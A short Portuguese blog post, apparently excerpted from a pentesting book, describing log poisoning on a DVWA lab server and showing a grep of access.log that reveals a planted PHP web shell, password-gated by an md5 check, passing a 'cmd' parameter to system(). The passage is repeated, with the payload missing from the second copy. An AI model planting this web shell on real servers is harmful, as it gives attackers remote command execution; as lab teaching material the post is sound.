EDITORA ESPAÇO: A RESPOSTA DO SERVIDOR É IRRELEVANTE, POIS O ARQUIVO access.log JÁ TERÁ SIDO CONTAMINADO. NO SERVIDOR DA APLICAÇÃO, PODEMOS CONFIRMAR SE O SHELL FOI GRAVADO NO ARQUIVO DE LOG PROCURANDO-O COM grep, ASSIM: root@dvwa:/# grep system /var/log/apache2/access.log 172.17.0.1 - - "GET /<?php if (md5($_GET['password']) == 'f1aab5cd9690adfa2dde9796b4c5d00d') { system($_GET[ 'cmd' ]); } ?> HTTP/1.1" 404 463 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" manual do hacker.

domingo, 15 de outubro de 2023

A RESPOSTA DO SERVIDOR É IRRELEVANTE, POIS O ARQUIVO access.log JÁ TERÁ SIDO CONTAMINADO. NO SERVIDOR DA APLICAÇÃO, PODEMOS CONFIRMAR SE O SHELL FOI GRAVADO NO ARQUIVO DE LOG PROCURANDO-O COM grep, ASSIM: root@dvwa:/# grep system /var/log/apache2/access.log 172.17.0.1 - - "GET / HTTP/1.1" 404 463 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" manual do hacker.

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)